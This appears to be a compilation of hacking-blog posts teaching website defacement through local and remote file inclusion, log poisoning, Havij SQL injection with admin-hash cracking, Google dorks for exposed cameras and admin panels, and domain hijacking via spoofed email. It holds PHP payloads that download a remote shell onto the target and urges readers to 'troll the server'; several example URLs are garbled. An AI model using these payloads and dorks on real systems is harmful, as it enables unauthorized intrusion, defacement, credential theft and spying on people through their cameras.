LFI- Defacing

[MethoD 1]

NOTE: You will need FireFox and its addon Tamper Data to do this method!

LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
In this method we are going to upload a shell by accessing the proc/self/environ.

Now we have our page

http://www.target.com/index.php?include=register.php

And now we are going to do this:

http://www.target.com/index.php?include=../


If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:

http://www.target.com/index.php?include=../etc/passwd


And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:

http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd


And so on. Now let's say we got to this URL

http://www.target.com/index.php?include=.../passwd
And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:

http://www.target.com/index.php?include=...environ


If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:

Code: 

<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.

Now simply access your shell by going to

http://www.taget.com/shell.php


And troll the server.

[Now LFI method 2]

NOTE: This only works on apache servers!

Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log

If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).

Now when you have found the file, open up cmd and type in

telnet http://www.tagrget.com 80

When you are inside the telnet, you copy the following code(you use your own shell url ofc)

Code: 

<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>


Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).

Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:

http://www.taget.com/shell.php

Author: AHFCREW blog
Video tut for the Tamper Data method!

http://www.youtube.com/watch?v=-YRdqD8199s

Agent's script used in the video:

Code: 

<?system('wget http://www.website.com/yourshell.txt -o shell.php');>

Read More

Deface via RFI

#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them Tongue


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Searching for Vuln. sites:

We can find Vuln.websites by using Google Dorks

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Checking if they are Vuln. :

Now after we searched for sites on Google, many sites will show but not all of them are Vuln.
so how can we check? Tongue

after opening the site check the link, for example it will be like:

http://www.tagert.com/index.php?page=ANYTHING

now to check the site we should replace "ANYTHING" with "http://www.google.com" Smile

so it will be like :

http://www.tagert.com/index.php?page=htt...google.com

IF Google home page showed up then the website is Vuln. for RFI,
IF not then fine another one Tongue




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Defacing:

OK, now if we found a Vuln. website how to deface? o_O

well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAMPLE it will be:
http://www.yourfreehost.com/shell.txt

http://www.tagert.com/index.php?page=htt...shell.txt?

[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL Tongue Big Grin

Now your shell will show so Deface the site Tongue

Read More

How To Hack Into Live Cameras Around The World

This simple technique is called “Google Hacking”. We are just looking for unsecured. cameras around the world and writing a simplestring on google hack into them.

Follow the steps below:
1) Choose any of these strings to enter on google

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”

2)Once you have picked one, simply copy it, and paste in on google.
3)Now choose any result and you will be seeing a live camera.

Read More

Find to Admin Page [Dork]

Put  inurl: infront of all dorks ::

like 

inurl:admin1.php
inurl:admin.html
 and so on...... 

admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
phpSQLiteAdmin/
server_admin_small/
database_administration/
system_administration

Read More

Hack Websites Using Havij [SQL Injection Tutorial]

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Supported Databases With Havij

• MsSQL 2000/2005 with error.

• MsSQL 2000/2005 no error union based

• MySQL union based

• MySQL Blind

• MySQL error based

• MySQL time based

• Oracle union based

• MsAccess union based

• Sybase (ASE)

Things We Need:

1. Havij Tool - (Search In Google And Download Cracked Version.)
2.  SQLI Vulnerable Website. - Use Google Dorks To Search Vulnerable Website.

Start Tutorial.

1. Open Havij.
2. Type Vulnerable Website Inside It And Hit Analyze Button.

3. Now Click On Tables Tab And Then Hit Get DBs Button.

4. Now You Have Got All Databases In Result. Tick Databases And Hit Get Tables Button.

5. You Have Got Tables From The Databases You Ticked In Previous Step. Now Tick Related Tables And Hit Get Columns Button.

6. You Have Got Columns From Ticked Table. Tick Related Columns And Press Get DataButton.

I Am Going To Choose Username, Password, UserGroup Columns. There Should Be Stored Data Related To Admin's Username, Password Etc.

7. Bingo! You Have Got Username And Password Of Admin.

How To Crack Hash?

As You Can See, We Have Received All Information Of Admin. Like Username, Password And UserGroup. But We Have Received Password In The Shape Of Hash. In Order To See The Real Password. We Have To Crack This Code. For Cracking This Code. We Will Make Use Of Havij Tool Again. Follow Me To Crack This Hash.

1. You Can See A Button Of MD5 In Buttons List Of Havij. Hit That Button And Paste Your Hash Code Inside It And Press Start Button.

2. You Can See Password In Plain Text In Result Now. See Picture Below.

Find Admin Page

We Have Got Everything. Like Username, Password. But Where To Use Them And Get Admin Rights? You Need To Find The Admin Login Page Of Target Site. For Finding Admin Page Of Target Site. We Will Use Havij Again.

1. In Buttons List, Press Find Admin Button. Type Homepage Url Of Target Site. Press Start Button.

You Will Get Result Same Like Hash Cracking. You Will Be Able To See The Page. Which Admin Of Your Target Site Use To Login.

-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r

Read More

Website hacking Methods.......

I gonna teach you some basic of website hacking so first We gonna learn about website defacement

1) What is Website defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers,who break into a web server and replace the hosted website with one of their own.

A high-profile website defacement was carried out on the website of the company SCO Group following its assertion that Linux contained stolen code. The title of the page was changed from "Red Hat vs SCO" to "SCO vsWorld," with various satirical content following

2) Terms to be used ---->

[SQL] - Structured Query Language

[LFI] - Local File Include

[RFI] - Remote File Include

[XSS] - Cross Site Scripting

[RCE] - Remote Code Execution

[AFD] - Arbitrary File Download

[SCD] - Source Code Disclosure

[PCI] - PHP Code Injection

3) Defacement techniques ?

I). DNS hijacking

II).FTP Protocol

III).Apache Vulnerable

IV).Script, Cookie, XSS

V).Social Engineering.

VI).SQL Injection

VII).RFI.

  

Now :-

I) What is Domain Hacking ?

A Domain hacking is a process to transfer domain(yahoo.com) without owner permission with help of phishing, sniffing,spoofing.

A domain hack is an unconventional domain name that combines domain levels, especially the top-level domain (TLD), to spell out the full "name" or title of the domain, making a kind of fun.

------->Domain Hacking process :--->

a) See who.is record of Slave(XXABCXX.net) DNS record and note

down admin email (xxabcxx@gmail/ymail/hotmail/live/[whatever apply this exception if possible admin(name)@XXABCXX.net] )

b) Send spoof mail to Slave admin email for password.

c) after open domain registrar ---->(my.india s.com)

their domain control panel (click forget password)

d) After you get a password in Slave email address of Slave domain.

e) Just login on domain control panel.

f) and get ECCP code and create new account on hosting company

and choose Domain transfer (all submit all details)

g) You will get all rights on this domain for lifetime.

  

II) What is FTP Protocol ?

The File Transfer Protocol (FTP) provides the basic elements of file sharing between hosts. FTP uses TCP to create a virtual connection for control information and then creates a separate TCP connection for data transfers. The control connection uses an image of the TELNET protocol to exchange commands and messages between hosts.

for detail check this Detail about FTP

III) What is XSS ?

XSS is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

Cross Site Scripting is a technique used to add script to a trusted site that will be executed

on other users browsers. A key element to XSS is that one user can submit data to a

website that will later be displayed for other users. It is nessesary that the bad guy NOT

mess up the HTML structure, otherwise the result will be web defacement rather then

attacking other users.

IV) What is Social Engineering ?

Social engineering is the act of manipulating people into doing actions or exposing confidential information. It's trickery or deception to gather information, fraud, or computer system access

where in the hacker never comes face-to-face with the Slave. Here are

I don't want to make my thread so big in size so i helped myself by

LINK

V) What is SQL injection ?

SQL injection is a type of security exploit in which the attacker

injects Structured Query Language (SQL) code through a web form input box, to gain access to resources, or make changes to data.

It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database.

-------------->Preventing SQL Injection

To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parameterized statements must be used (preferred), or user input must be carefully escaped or filtered.

VI) What is RFI ?

  

Remote File Inclusion attacks allow malicious users to run their own PHPcode on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page. 

Read More